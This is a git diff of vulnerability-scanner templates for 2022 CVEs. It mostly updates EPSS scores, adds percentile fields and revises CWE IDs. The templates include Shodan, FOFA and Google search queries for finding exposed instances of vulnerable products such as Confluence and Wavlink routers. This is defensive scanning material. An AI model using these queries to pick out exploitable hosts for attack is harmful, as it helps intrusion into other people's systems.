cpe: cpe:2.3:o:wavlink:wl-wn535k2_firmware:-:*:*:*:*:*:*:*
+ epss-percentile: 0.99771
metadata:
max-request: 1
shodan-query: http.title:"Wi-Fi APP Login"
diff --git a/http/cves/2022/CVE-2022-2487.yaml b/http/cves/2022/CVE-2022-2487.yaml
index af17223743..1e078f8fc2 100644
--- a/http/cves/2022/CVE-2022-2487.yaml
+++ b/http/cves/2022/CVE-2022-2487.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-2487
cwe-id: CWE-78
- epss-score: 0.97408
+ epss-score: 0.9737
cpe: cpe:2.3:o:wavlink:wl-wn535k2_firmware:-:*:*:*:*:*:*:*
+ epss-percentile: 0.99849
metadata:
max-request: 1
shodan-query: http.title:"Wi-Fi APP Login"
diff --git a/http/cves/2022/CVE-2022-2488.yaml b/http/cves/2022/CVE-2022-2488.yaml
index 43e5b94040..3fa2b6e542 100644
--- a/http/cves/2022/CVE-2022-2488.yaml
+++ b/http/cves/2022/CVE-2022-2488.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-2488
cwe-id: CWE-78
- epss-score: 0.97381
+ epss-score: 0.97387
cpe: cpe:2.3:o:wavlink:wl-wn535k2_firmware:-:*:*:*:*:*:*:*
+ epss-percentile: 0.99867
metadata:
max-request: 1
shodan-query: http.title:"Wi-Fi APP Login"
diff --git a/http/cves/2022/CVE-2022-24899.yaml b/http/cves/2022/CVE-2022-24899.yaml
index aa0df541fc..30dd72da18 100644
--- a/http/cves/2022/CVE-2022-24899.yaml
+++ b/http/cves/2022/CVE-2022-24899.yaml
@@ -18,8 +18,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2022-24899
cwe-id: CWE-79
- epss-score: 0.00254
+ epss-score: 0.00303
cpe: cpe:2.3:a:contao:contao:*:*:*:*:*:*:*:*
+ epss-percentile: 0.65765
metadata:
max-request: 1
shodan-query: title:"Contao"
diff --git a/http/cves/2022/CVE-2022-24900.yaml b/http/cves/2022/CVE-2022-24900.yaml
index 11bf209797..ac93cdd178 100644
--- a/http/cves/2022/CVE-2022-24900.yaml
+++ b/http/cves/2022/CVE-2022-24900.yaml
@@ -15,9 +15,10 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cve-id: CVE-2022-24900
- cwe-id: CWE-22,CWE-668
- epss-score: 0.00909
+ cwe-id: CWE-668,CWE-22
+ epss-score: 0.01086
cpe: cpe:2.3:a:piano_led_visualizer_project:piano_led_visualizer:*:*:*:*:*:*:*:*
+ epss-percentile: 0.82518
metadata:
max-request: 1
vendor: piano_led_visualizer_project
diff --git a/http/cves/2022/CVE-2022-24990.yaml b/http/cves/2022/CVE-2022-24990.yaml
index 8c8768a861..42d665e9f8 100644
--- a/http/cves/2022/CVE-2022-24990.yaml
+++ b/http/cves/2022/CVE-2022-24990.yaml
@@ -14,8 +14,10 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-24990
- epss-score: 0.96236
+ cwe-id: CWE-306
+ epss-score: 0.96102
cpe: cpe:2.3:o:terra-master:terramaster_operating_system:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99272
metadata:
max-request: 1
shodan-query: "TerraMaster"
diff --git a/http/cves/2022/CVE-2022-25082.yaml b/http/cves/2022/CVE-2022-25082.yaml
index de4526034c..7c3256f814 100644
--- a/http/cves/2022/CVE-2022-25082.yaml
+++ b/http/cves/2022/CVE-2022-25082.yaml
@@ -13,9 +13,10 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-25082
- cwe-id: CWE-77
- epss-score: 0.04345
+ cwe-id: CWE-78
+ epss-score: 0.02673
cpe: cpe:2.3:o:totolink:a950rg_firmware:4.1.2cu.5204_b20210112:*:*:*:*:*:*:*
+ epss-percentile: 0.89078
metadata:
max-request: 2
vendor: totolink
diff --git a/http/cves/2022/CVE-2022-25125.yaml b/http/cves/2022/CVE-2022-25125.yaml
index fc4bc849ed..c7e278ac23 100644
--- a/http/cves/2022/CVE-2022-25125.yaml
+++ b/http/cves/2022/CVE-2022-25125.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-25125
cwe-id: CWE-89
- epss-score: 0.01144
+ epss-score: 0.01029
cpe: cpe:2.3:a:mingsoft:mcms:5.2.4:*:*:*:*:*:*:*
+ epss-percentile: 0.81996
metadata:
max-request: 1
fofa-query: icon_hash="1464851260"
diff --git a/http/cves/2022/CVE-2022-25216.yaml b/http/cves/2022/CVE-2022-25216.yaml
index c0173d5350..ce92fb13a6 100644
--- a/http/cves/2022/CVE-2022-25216.yaml
+++ b/http/cves/2022/CVE-2022-25216.yaml
@@ -13,8 +13,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2022-25216
cwe-id: CWE-22
- epss-score: 0.00838
+ epss-score: 0.00979
cpe: cpe:2.3:a:dvdfab:12_player:*:*:*:*:*:*:*:*
+ epss-percentile: 0.81504
metadata:
max-request: 1
vendor: dvdfab
diff --git a/http/cves/2022/CVE-2022-25323.yaml b/http/cves/2022/CVE-2022-25323.yaml
index dbac1620f9..9c74749ff4 100644
--- a/http/cves/2022/CVE-2022-25323.yaml
+++ b/http/cves/2022/CVE-2022-25323.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2022-25323
cwe-id: CWE-79
- epss-score: 0.00129
+ epss-score: 0.00132
cpe: cpe:2.3:a:zerof:web_server:2.0:*:*:*:*:*:*:*
+ epss-percentile: 0.47422
metadata:
max-request: 1
vendor: zerof
diff --git a/http/cves/2022/CVE-2022-25356.yaml b/http/cves/2022/CVE-2022-25356.yaml
index e3415eed65..c2b3fb1659 100644
--- a/http/cves/2022/CVE-2022-25356.yaml
+++ b/http/cves/2022/CVE-2022-25356.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-91
epss-score: 0.00437
cpe: cpe:2.3:a:altn:securitygateway:*:*:*:*:*:*:*:*
+ epss-percentile: 0.71533
metadata:
max-request: 1
google-query: inurl:"/SecurityGateway.dll"
diff --git a/http/cves/2022/CVE-2022-25369.yaml b/http/cves/2022/CVE-2022-25369.yaml
index 3b7147d84d..aa74576b9e 100644
--- a/http/cves/2022/CVE-2022-25369.yaml
+++ b/http/cves/2022/CVE-2022-25369.yaml
@@ -8,12 +8,12 @@ info:
reference:
- https://blog.assetnote.io/2022/02/20/logicflaw-dynamicweb-rce/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25369
+ remediation: 'Upgrade to one of the fixed versions or higher: Dynamicweb 9.5.9, 9.6.16, 9.7.8, 9.8.11, 9.9, 9.10.18, 9.12.8, or 9.13.0.'
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-25369
cwe-id: CWE-425
- remediation: 'Upgrade to one of the fixed versions or higher: Dynamicweb 9.5.9, 9.6.16, 9.7.8, 9.8.11, 9.9, 9.10.18, 9.12.8, or 9.13.0.'
metadata:
max-request: 1
shodan-query: http.component:"Dynamicweb"
diff --git a/http/cves/2022/CVE-2022-2544.yaml b/http/cves/2022/CVE-2022-2544.yaml
index 8731a3ab09..e182da5f35 100644
--- a/http/cves/2022/CVE-2022-2544.yaml
+++ b/http/cves/2022/CVE-2022-2544.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2022-2544
cwe-id: CWE-425
- epss-score: 0.01127
+ epss-score: 0.00695
cpe: cpe:2.3:a:wpmanageninja:ninja_job_board:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.77722
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2022/CVE-2022-2546.yaml b/http/cves/2022/CVE-2022-2546.yaml
index ffdf295ed8..7ec42c5239 100644
--- a/http/cves/2022/CVE-2022-2546.yaml
+++ b/http/cves/2022/CVE-2022-2546.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00091
cpe: cpe:2.3:a:servmask:all-in-one_wp_migration:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.38082
metadata:
max-request: 3
verified: true
diff --git a/http/cves/2022/CVE-2022-25481.yaml b/http/cves/2022/CVE-2022-25481.yaml
index b467d195b5..b03853fbdd 100644
--- a/http/cves/2022/CVE-2022-25481.yaml
+++ b/http/cves/2022/CVE-2022-25481.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-668
epss-score: 0.00892
cpe: cpe:2.3:a:thinkphp:thinkphp:5.0.24:*:*:*:*:*:*:*
+ epss-percentile: 0.80599
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2022/CVE-2022-25485.yaml b/http/cves/2022/CVE-2022-25485.yaml
index d12246cfbc..ee38cf07aa 100644
--- a/http/cves/2022/CVE-2022-25485.yaml
+++ b/http/cves/2022/CVE-2022-25485.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 7.8
cve-id: CVE-2022-25485
cwe-id: CWE-829
- epss-score: 0.0107
+ epss-score: 0.00878
cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.80396
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2022/CVE-2022-25486.yaml b/http/cves/2022/CVE-2022-25486.yaml
index c0909b374f..6c64a082bb 100644
--- a/http/cves/2022/CVE-2022-25486.yaml
+++ b/http/cves/2022/CVE-2022-25486.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 7.8
cve-id: CVE-2022-25486
cwe-id: CWE-829
- epss-score: 0.00651
+ epss-score: 0.01337
cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.84385
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2022/CVE-2022-25487.yaml b/http/cves/2022/CVE-2022-25487.yaml
index b0722dde8b..f9abeac88d 100644
--- a/http/cves/2022/CVE-2022-25487.yaml
+++ b/http/cves/2022/CVE-2022-25487.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-25487
cwe-id: CWE-434
- epss-score: 0.79593
+ epss-score: 0.82264
cpe: cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:*
+ epss-percentile: 0.97952
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2022/CVE-2022-25488.yaml b/http/cves/2022/CVE-2022-25488.yaml
index 8d748628f4..c5a8703e33 100644
--- a/http/cves/2022/CVE-2022-25488.yaml
+++ b/http/cves/2022/CVE-2022-25488.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-25488
cwe-id: CWE-89
- epss-score: 0.01144
+ epss-score: 0.00942
cpe: cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:*
+ epss-percentile: 0.81133
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2022/CVE-2022-25489.yaml b/http/cves/2022/CVE-2022-25489.yaml
index 56afa2efe2..dd1ec836c5 100644
--- a/http/cves/2022/CVE-2022-25489.yaml
+++ b/http/cves/2022/CVE-2022-25489.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 5.4
cve-id: CVE-2022-25489
cwe-id: CWE-79
- epss-score: 0.00537
+ epss-score: 0.016
cpe: cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:*
+ epss-percentile: 0.85784
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2022/CVE-2022-25497.yaml b/http/cves/2022/CVE-2022-25497.yaml
index 65496ac6ce..425d220ab4 100644
--- a/http/cves/2022/CVE-2022-25497.yaml
+++ b/http/cves/2022/CVE-2022-25497.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 5.3
cve-id: CVE-2022-25497
cwe-id: CWE-552
- epss-score: 0.00494
+ epss-score: 0.00901
cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.807
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2022/CVE-2022-2551.yaml b/http/cves/2022/CVE-2022-2551.yaml
index 82dd88c56a..495f673e1b 100644
--- a/http/cves/2022/CVE-2022-2551.yaml
+++ b/http/cves/2022/CVE-2022-2551.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2022-2551
cwe-id: CWE-425
- epss-score: 0.86816
+ epss-score: 0.82414
cpe: cpe:2.3:a:snapcreek:duplicator:*:*:*:*:lite:wordpress:*:*
+ epss-percentile: 0.9796
metadata:
max-request: 2
google-query: inurl:/backups-dup-lite/dup-installer/
diff --git a/http/cves/2022/CVE-2022-2599.yaml b/http/cves/2022/CVE-2022-2599.yaml
index d92b301a0f..617b4def2d 100644
--- a/http/cves/2022/CVE-2022-2599.yaml
+++ b/http/cves/2022/CVE-2022-2599.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2022-2599
cwe-id: CWE-79
- epss-score: 0.00071
+ epss-score: 0.00078
cpe: cpe:2.3:a:anti-malware_security_and_brute-force_firewall_project:anti-malware_security_and_brute-force_firewall:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.32485
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2022/CVE-2022-26134.yaml b/http/cves/2022/CVE-2022-26134.yaml
index 1655ee794e..3f38af7dc8 100644
--- a/http/cves/2022/CVE-2022-26134.yaml
+++ b/http/cves/2022/CVE-2022-26134.yaml
@@ -16,9 +16,10 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-26134
- cwe-id: CWE-74
- epss-score: 0.97537
+ cwe-id: CWE-917
+ epss-score: 0.97518
cpe: cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99975
metadata:
max-request: 2
shodan-query: http.component:"Atlassian Confluence"
diff --git a/http/cves/2022/CVE-2022-26138.yaml b/http/cves/2022/CVE-2022-26138.yaml
index 330511e237..c376f99ff2 100644
--- a/http/cves/2022/CVE-2022-26138.yaml
+++ b/http/cves/2022/CVE-2022-26138.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-26138
cwe-id: CWE-798
- epss-score: 0.97313
+ epss-score: 0.97318
cpe: cpe:2.3:a:atlassian:questions_for_confluence:2.7.34:*:*:*:*:*:*:*
+ epss-percentile: 0.99809
metadata:
max-request: 1
shodan-query: http.component:"Atlassian Confluence"
diff --git a/http/cves/2022/CVE-2022-26148.yaml b/http/cves/2022/CVE-2022-26148.yaml
index fcbf9ffddb..f0f7cfee0d 100644
--- a/http/cves/2022/CVE-2022-26148.yaml
+++ b/http/cves/2022/CVE-2022-26148.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-26148
cwe-id: CWE-312
- epss-score: 0.12526
+ epss-score: 0.10813
cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*
+ epss-percentile: 0.94349
metadata:
max-request: 1
fofa-query: app="Grafana"
diff --git a/http/cves/2022/CVE-2022-26159.yaml b/http/cves/2022/CVE-2022-26159.yaml
index 1c3b151099..0f3437c94e 100644
--- a/http/cves/2022/CVE-2022-26159.yaml
+++ b/http/cves/2022/CVE-2022-26159.yaml
@@ -14,9 +14,10 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2022-26159
- cwe-id: CWE-668
- epss-score: 0.00561
+ cwe-id: CWE-425
+ epss-score: 0.00665
cpe: cpe:2.3:a:ametys:ametys:*:*:*:*:*:*:*:*
+ epss-percentile: 0.77095
metadata:
max-request: 1
vendor: ametys
diff --git a/http/cves/2022/CVE-2022-26233.yaml b/http/cves/2022/CVE-2022-26233.yaml
index 6e08959a20..40e3af431d 100644
--- a/http/cves/2022/CVE-2022-26233.yaml
+++ b/http/cves/2022/CVE-2022-26233.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2022-26233
cwe-id: CWE-22
- epss-score: 0.00413
+ epss-score: 0.00482
cpe: cpe:2.3:a:barco:control_room_management_suite:*:*:*:*:*:*:*:*
+ epss-percentile: 0.72843
metadata:
max-request: 1
vendor: barco
diff --git a/http/cves/2022/CVE-2022-26263.yaml b/http/cves/2022/CVE-2022-26263.yaml
index 4630b2e919..f571e5177c 100644
--- a/http/cves/2022/CVE-2022-26263.yaml
+++ b/http/cves/2022/CVE-2022-26263.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2022-26263
cwe-id: CWE-79
- epss-score: 0.00109
+ epss-score: 0.00111
cpe: cpe:2.3:a:yonyou:u8\+:13.0:*:*:*:*:*:*:*
+ epss-percentile: 0.4359
metadata:
verified: true
google-query: inurl:/u8sl/WebHelp
diff --git a/http/cves/2022/CVE-2022-2627.yaml b/http/cves/2022/CVE-2022-2627.yaml
index 0485651b64..a531c4eb33 100644
--- a/http/cves/2022/CVE-2022-2627.yaml
+++ b/http/cves/2022/CVE-2022-2627.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00071
cpe: cpe:2.3:a:tagdiv:newspaper:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.29012
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2022/CVE-2022-2633.yaml b/http/cves/2022/CVE-2022-2633.yaml
index 3bb92d95b0..f6afd12a1f 100644
--- a/http/cves/2022/CVE-2022-2633.yaml
+++ b/http/cves/2022/CVE-2022-2633.yaml
@@ -16,9 +16,10 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
cvss-score: 8.2
cve-id: CVE-2022-2633
- cwe-id: CWE-73,CWE-610
- epss-score: 0.03888
+ cwe-id: CWE-610,CWE-73
+ epss-score: 0.04403
cpe: cpe:2.3:a:plugins360:all-in-one_video_gallery:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.91307
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2022/CVE-2022-26352.yaml b/http/cves/2022/CVE-2022-26352.yaml
index 9473193169..6704dad26d 100644
--- a/http/cves/2022/CVE-2022-26352.yaml
+++ b/http/cves/2022/CVE-2022-26352.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-26352
cwe-id: CWE-22
- epss-score: 0.97512
+ epss-score: 0.97466
cpe: cpe:2.3:a:dotcms:dotcms:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99936
metadata:
max-request: 2
vendor: dotcms
diff --git a/http/cves/2022/CVE-2022-26564.yaml b/http/cves/2022/CVE-2022-26564.yaml
index 763ad4d49a..641ea7e796 100644
--- a/http/cves/2022/CVE-2022-26564.yaml
+++ b/http/cves/2022/CVE-2022-26564.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00109
cpe: cpe:2.3:a:digitaldruid:hoteldruid:3.0.3:*:*:*:*:*:*:*
+ epss-percentile: 0.43197
metadata:
max-request: 3
shodan-query: http.favicon.hash:-1521640213
diff --git a/http/cves/2022/CVE-2022-26833.yaml b/http/cves/2022/CVE-2022-26833.yaml
index 2ae7a35ad1..e219de0ea5 100644
--- a/http/cves/2022/CVE-2022-26833.yaml
+++ b/http/cves/2022/CVE-2022-26833.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-26833
cwe-id: CWE-306
- epss-score: 0.01062
+ epss-score: 0.01194
cpe: cpe:2.3:a:openautomationsoftware:oas_platform:16.00.0112:*:*:*:*:*:*:*
+ epss-percentile: 0.83396
metadata:
max-request: 1
vendor: openautomationsoftware
diff --git a/http/cves/2022/CVE-2022-26960.yaml b/http/cves/2022/CVE-2022-26960.yaml
index 674c5c73ef..2be2564b63 100644
--- a/http/cves/2022/CVE-2022-26960.yaml
+++ b/http/cves/2022/CVE-2022-26960.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-22
epss-score: 0.93292
cpe: cpe:2.3:a:std42:elfinder:*:*:*:*:*:*:*:*
+ epss-percentile: 0.98708
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2022/CVE-2022-2733.yaml b/http/cves/2022/CVE-2022-2733.yaml
index 30717cf336..729ffc5b16 100644
--- a/http/cves/2022/CVE-2022-2733.yaml
+++ b/http/cves/2022/CVE-2022-2733.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2022-2733
cwe-id: CWE-79
- epss-score: 0.00238
+ epss-score: 0.00175
cpe: cpe:2.3:a:open-emr:openemr:*:*:*:*:*:*:*:*
+ epss-percentile: 0.53954
metadata:
max-request: 2
shodan-query: title:"OpenEMR"
diff --git a/http/cves/2022/CVE-2022-2756.yaml b/http/cves/2022/CVE-2022-2756.yaml
index 66178b8ed1..f70cbc346b 100644
--- a/http/cves/2022/CVE-2022-2756.yaml
+++ b/http/cves/2022/CVE-2022-2756.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 6.5
cve-id: CVE-2022-2756
cwe-id: CWE-918
- epss-score: 0.00689
+ epss-score: 0.00724
cpe: cpe:2.3:a:kavitareader:kavita:*:*:*:*:*:*:*:*
+ epss-percentile: 0.78253
metadata:
max-request: 3
shodan-query: title:"kavita"
diff --git a/http/cves/2022/CVE-2022-27593.yaml b/http/cves/2022/CVE-2022-27593.yaml
index 3b4e565a16..c744f3980f 100644
--- a/http/cves/2022/CVE-2022-27593.yaml
+++ b/http/cves/2022/CVE-2022-27593.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 9.1
cve-id: CVE-2022-27593
cwe-id: CWE-610
- epss-score: 0.58116
+ epss-score: 0.56164
cpe: cpe:2.3:a:qnap:photo_station:*:*:*:*:*:*:*:*
+ epss-percentile: 0.97221
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2022/CVE-2022-27849.yaml b/http/cves/2022/CVE-2022-27849.yaml
index d9f95b8979..96938300ce 100644
--- a/http/cves/2022/CVE-2022-27849.yaml
+++ b/http/cves/2022/CVE-2022-27849.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-200
epss-score: 0.00654
cpe: cpe:2.3:a:plugin-planet:simple_ajax_chat:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.76863
metadata:
max-request: 1
google-query: inurl:/wp-content/plugins/simple-ajax-chat/
diff --git a/http/cves/2022/CVE-2022-27926.yaml b/http/cves/2022/CVE-2022-27926.yaml
index 8f9eacd434..8b5d6f3b8a 100644
--- a/http/cves/2022/CVE-2022-27926.yaml
+++ b/http/cves/2022/CVE-2022-27926.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2022-27926
cwe-id: CWE-79
- epss-score: 0.93282
+ epss-score: 0.93948
cpe: cpe:2.3:a:zimbra:collaboration:9.0.0:-:*:*:*:*:*:*
+ epss-percentile: 0.98805
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2022/CVE-2022-27927.yaml b/http/cves/2022/CVE-2022-27927.yaml
index d07a5acbc1..d42b4c642c 100644
--- a/http/cves/2022/CVE-2022-27927.yaml
+++ b/http/cves/2022/CVE-2022-27927.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-89
epss-score: 0.01576
cpe: cpe:2.3:a:microfinance_management_system_project:microfinance_management_system:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.85682
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2022/CVE-2022-27984.yaml b/http/cves/2022/CVE-2022-27984.yaml
index bb58c93149..5af476d840 100644
--- a/http/cves/2022/CVE-2022-27984.yaml
+++ b/http/cves/2022/CVE-2022-27984.yaml
@@ -10,13 +10,15 @@ info:
- https://github.com/CuppaCMS/CuppaCMS
- https://nvd.nist.gov/vuln/detail/CVE-2022-27984
- https://www.cuppacms.com/
+ - http://cuppa.com
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-27984
cwe-id: CWE-89
- epss-score: 0.01318
+ epss-score: 0.0148
cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.85145
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2022/CVE-2022-27985.yaml b/http/cves/2022/CVE-2022-27985.yaml
index f1eb61e9c6..0bde70b02b 100644
--- a/http/cves/2022/CVE-2022-27985.yaml
+++ b/http/cves/2022/CVE-2022-27985.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2022-27985
cwe-id: CWE-89
- epss-score: 0.01366
+ epss-score: 0.01534
cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.85463
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2022/CVE-2022-28022.yaml b/http/cves/2022/CVE-2022-28022.yaml
index f19faccedc..bb7799253e 100644
--- a/http/cves/2022/CVE-2022-28022.yaml
+++ b/http/cves/2022/CVE-2022-28022.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-89
epss-score: 0.01144
cpe: cpe:2.3:a:purchase_order_management_system_project:purchase_order_management_system:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.82961
metadata:
max-request: 1
verified: "true"
diff --git a/http/cves/2022/CVE-2022-28023.yaml b/http/cves/2022/CVE-2022-28023.yaml
index 9bf91fe3a0..addfa5be19 100644
--- a/http/cves/2022/CVE-2022-28023.yaml
+++ b/http/cves/2022/CVE-2022-28023.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-89
epss-score: 0.01144
cpe: cpe:2.3:a:purchase_order_management_system_project:purchase_order_management_system:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.82961
metadata:
max-request: 1
verified: "true"
diff --git a/http/cves/2022/CVE-2022-28032.yaml b/http/cves/2022/CVE-2022-28032.yaml
index 39408dd8c6..99bf9626a7 100644
--- a/http/cves/2022/CVE-2022-28032.yaml
+++ b/http/cves/2022/CVE-2022-28032.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-89
epss-score: 0.01144
cpe: cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:*
+ epss-percentile: 0.82961
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2022/CVE-2022-28079.yaml b/http/cves/2022/CVE-2022-28079.yaml
index d700db5fa7..9311580ee5 100644
--- a/http/cves/2022/CVE-2022-28079.yaml
+++ b/http/cves/2022/CVE-2022-28079.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-89
epss-score: 0.82769
cpe: cpe:2.3:a:college_management_system_project:college_management_system:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.97977
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2022/CVE-2022-28080.yaml b/http/cves/2022/CVE-2022-28080.yaml
index 85e2e74239..9fe8912220 100644
--- a/http/cves/2022/CVE-2022-28080.yaml
+++ b/http/cves/2022/CVE-2022-28080.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-89
epss-score: 0.01427
cpe: cpe:2.3:a:event_management_system_project:event_management_system:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.84873
metadata:
max-request: 2
vendor: event_management_system_project
diff --git a/http/cves/2022/CVE-2022-28117.yaml b/http/cves/2022/CVE-2022-28117.yaml
index ad213701e4..bb15c9dbbf 100644
--- a/http/cves/2022/CVE-2022-28117.yaml
+++ b/http/cves/2022/CVE-2022-28117.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 4.9
cve-id: CVE-2022-28117
cwe-id: CWE-918
- epss-score: 0.01202
+ epss-score: 0.01914
cpe: cpe:2.3:a:naviwebs:navigate_cms:2.9.4:*:*:*:*:*:*:*
+ epss-percentile: 0.87092
metadata:
max-request: 4
verified: true
diff --git a/http/cves/2022/CVE-2022-28219.yaml b/http/cves/2022/CVE-2022-28219.yaml
index f1cca156a0..67dae3827b 100644
--- a/http/cves/2022/CVE-2022-28219.yaml
+++ b/http/cves/2022/CVE-2022-28219.yaml
@@ -23,6 +23,7 @@ info:
cwe-id: CWE-611
epss-score: 0.97341
cpe: cpe:2.3:a:zohocorp:manageengine_adaudit_plus:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99825
metadata:
max-request: 1
shodan-query: http.title:"ADAudit Plus" || http.title:"ManageEngine - ADManager Plus"
diff --git a/http/cves/2022/CVE-2022-28290.yaml b/http/cves/2022/CVE-2022-28290.yaml
index 8bf1accacf..f856e68bb9 100644
--- a/http/cves/2022/CVE-2022-28290.yaml
+++ b/http/cves/2022/CVE-2022-28290.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00099
cpe: cpe:2.3:a:welaunch:wordpress_country_selector:1.6.5:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.4034
metadata:
max-request: 2
framework: wordpress
diff --git a/http/cves/2022/CVE-2022-28363.yaml b/http/cves/2022/CVE-2022-28363.yaml
index 9032c1188b..d053d9b067 100644
--- a/http/cves/2022/CVE-2022-28363.yaml
+++ b/http/cves/2022/CVE-2022-28363.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2022-28363
cwe-id: CWE-79
